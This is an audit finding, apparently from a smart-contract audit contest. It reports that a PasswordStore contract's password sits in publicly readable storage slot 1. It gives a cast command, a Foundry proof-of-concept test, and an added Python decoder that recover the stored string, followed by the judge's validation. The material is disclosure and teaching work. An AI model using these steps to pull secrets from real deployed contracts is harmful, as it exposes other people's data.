Submission Details
Severity: high
Valid

Password is publicly accessible

Summary

All data on the blockchain is public, which means that anyone can read it.

Vulnerability Details

The password variable s_password is stored in publicly accessible storage; everything stored on the blockchain is public, so anyone who can read the contract's storage slot can read the password.

Reproduction step:

cast storage <contract-address> 1 | cast parse-bytes32-string

Impact

Since the main goal of the contract is to store that password securely, this vulnerability has a severe impact.

    /*
     * This POC test will work for password strings shorter than 32 bytes
     * (Solidity's "short string" storage form, where the string data and its
     * length share one slot). For longer strings the test would have to be
     * modified, because the data then lives in separate slots.
     */
    function test_password_is_public() public {
        // s_password occupies storage slot 1 of the PasswordStore contract
        uint256 slot = 1;
        bytes32 memoryData = vm.load(
            address(passwordStore),
            bytes32(slot)
        );
        // removing the last byte, where the length of the data is stored
        bytes32 recoveredPassword;
        assembly {
            recoveredPassword := and(memoryData, not(0xff))
        }
        // only the owner may call getPassword(), so impersonate the owner
        vm.startPrank(address(owner));
        string memory actualPassword = passwordStore.getPassword();
        // converting the string to bytes32 and comparing bytes32 to bytes32
        assertEq(
            bytes32(bytes(actualPassword)),
            recoveredPassword
        );
    }
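The POC above only covers the short-string form of storage. The following added example (not part of the original submission or the PasswordStore project) decodes a Solidity string from raw storage words for both forms: strings shorter than 32 bytes, where data and length share slot 1 as the POC assumes, and longer strings, whose main slot holds length * 2 + 1 and whose bytes live at keccak256(slot) onward. The keccak256 function is injected (pass pycryptodome's or web3's keccak in real use); the offline demo uses a SHA-256 stand-in, which is not Ethereum's keccak256, and a constructed storage map.

```python
import hashlib
from typing import Callable, Dict

Keccak = Callable[[bytes], bytes]


def encode_string_storage(slot: int, text: str, keccak: Keccak) -> Dict[int, bytes]:
    """Build the slot -> bytes32 map the EVM holds for a `string` at `slot`."""
    data = text.encode()
    n = len(data)
    if n < 32:
        # Short form: data left-aligned, lowest byte holds length * 2 (even).
        return {slot: data.ljust(31, b"\x00") + bytes([n * 2])}
    # Long form: main slot holds length * 2 + 1 (odd); data at keccak256(slot) + i.
    storage = {slot: (n * 2 + 1).to_bytes(32, "big")}
    base = int.from_bytes(keccak(slot.to_bytes(32, "big")), "big")
    for i in range(0, n, 32):
        storage[base + i // 32] = data[i:i + 32].ljust(32, b"\x00")
    return storage


def decode_string_storage(slot: int, storage: Dict[int, bytes], keccak: Keccak) -> str:
    """Recover the string from storage words, as `cast storage` would read them."""
    word = storage[slot]
    if word[-1] & 1 == 0:
        # Short form: the lowest byte is length * 2, the rest is the data.
        n = word[-1] // 2
        return word[:n].decode()
    # Long form: length from the main slot, data spread over ceil(n / 32) slots.
    n = (int.from_bytes(word, "big") - 1) // 2
    base = int.from_bytes(keccak(slot.to_bytes(32, "big")), "big")
    chunks = b"".join(storage[base + i] for i in range((n + 31) // 32))
    return chunks[:n].decode()


def demo_keccak(b: bytes) -> bytes:
    """Stand-in hash for the offline demo only; real code must use keccak256."""
    return hashlib.sha256(b).digest()


if __name__ == "__main__":
    # Constructed sample storage: slot 1 is where PasswordStore keeps s_password.
    for pw in ("myPassword", "a" * 45):
        st = encode_string_storage(1, pw, demo_keccak)
        print(f"slot 1 = 0x{st[1].hex()} -> {decode_string_storage(1, st, demo_keccak)!r}")
```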

Tools Used

Foundry/cast

Recommendations

Do not store private data on the blockchain.

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in and not in derived contracts. In this case, private doesn't mean secret/confidential.
